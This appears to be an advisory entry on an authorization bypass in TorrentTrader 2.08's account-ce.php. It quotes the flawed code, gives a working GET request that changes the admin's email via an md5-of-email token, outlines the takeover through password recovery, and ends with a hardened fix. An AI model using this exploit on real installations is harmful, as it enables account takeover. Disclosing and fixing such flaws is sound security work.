###############################################################################
1. Unauthorized Email Change in "account-ce.php"
###############################################################################
Reason: authorization bypass
Attack vector: user-submitted GET parameters "id", "secret" and "email"
Preconditions: none
Result: attacker can change any user's email, including admin's
-----------------[ source code start ]---------------------------------
PHP Code:
$id = (int) $_GET["id"];
$md5 = $_GET["secret"];
$email = $_GET["email"];
// `editsecret` is the empty string for any user who has no pending e-mail change.
$res = SQL_Query_exec("SELECT `editsecret` FROM `users` WHERE `enabled` = 'yes' AND `status` = 'confirmed' AND `id` = '$id'");
$row = mysql_fetch_assoc($res);
$sec = $row["editsecret"];
// With $sec == '' the expected token degenerates to md5($email), which needs no secret knowledge.
if ($md5 != md5($sec . $email . $sec)) show_error_msg(T_("ERROR"), T_("NOTHING_FOUND"), 1);
// The WHERE clause also matches the empty `editsecret`, so the UPDATE succeeds.
SQL_Query_exec("UPDATE `users` SET `editsecret` = '', `email` = ".sqlesc($email)." WHERE `id` = '$id' AND `editsecret` = " . sqlesc($row["editsecret"]));
-----------------[ source code end ]-----------------------------------
Tests: Let's find the md5 hash of the email "test@test.com", which is "b642b4217b34b1e8d3bd915fc65c4452".
The target user ID is 1. We issue the GET request:
http://localhost/torrenttrader208/account-ce.php?id=1&secret=b642b4217b34b1e8d3bd915fc65c4452&email=test@test.com
A quick look at the database confirms that the email address of the user with ID 1 has indeed been changed.
The next logical move for the attacker is a password recovery request:
http://localhost/torrenttrader208/account-recover.php
After taking over the admin account, the attacker can use the next vulnerability, described below, which may allow PHP remote code execution.
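For comparison, a hardened version of the token check from account-ce.php, written as an added example (not TorrentTrader's code; the function name and the constructed demo values are assumptions): a user with no pending change is rejected outright, and the submitted token is compared strictly and in constant time.

```php
<?php
// Added example, not part of TorrentTrader: hardened verification of the
// email-change token. Returns true only when a pending editsecret exists
// and the submitted token was derived from it.
function verify_edit_secret(?string $stored_secret, string $email, string $submitted): bool
{
    // Root cause of the original bug: with an empty editsecret the expected
    // token is just md5($email). A row without a pending change must fail.
    if ($stored_secret === null || $stored_secret === '') {
        return false;
    }

    // Accept only the exact 32-hex-digit form that md5() produces, so a
    // malformed or empty "secret" parameter can never be compared loosely.
    if (!preg_match('/^[0-9a-f]{32}$/', $submitted)) {
        return false;
    }

    $expected = md5($stored_secret . $email . $stored_secret);

    // hash_equals() is a strict, constant-time string comparison, unlike the
    // original `!=`, which applies PHP's loose comparison rules.
    return hash_equals($expected, $submitted);
}

// Constructed demo values (not from the advisory).
$email   = 'test@test.com';
$pending = bin2hex(random_bytes(16));   // a genuine pending-change secret

// Case 1: no pending change; token is md5 of the email alone (the advisory's request).
var_dump(verify_edit_secret('', $email, md5($email)));

// Case 2: pending change with the correct token, as issued by the legitimate flow.
var_dump(verify_edit_secret($pending, $email, md5($pending . $email . $pending)));

// Case 3: pending change but a token computed without the secret.
var_dump(verify_edit_secret($pending, $email, md5($email)));
```

The UPDATE should likewise be guarded with `AND editsecret <> ''` so that the database rejects the change even if the PHP check is ever skipped.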
###############################################################################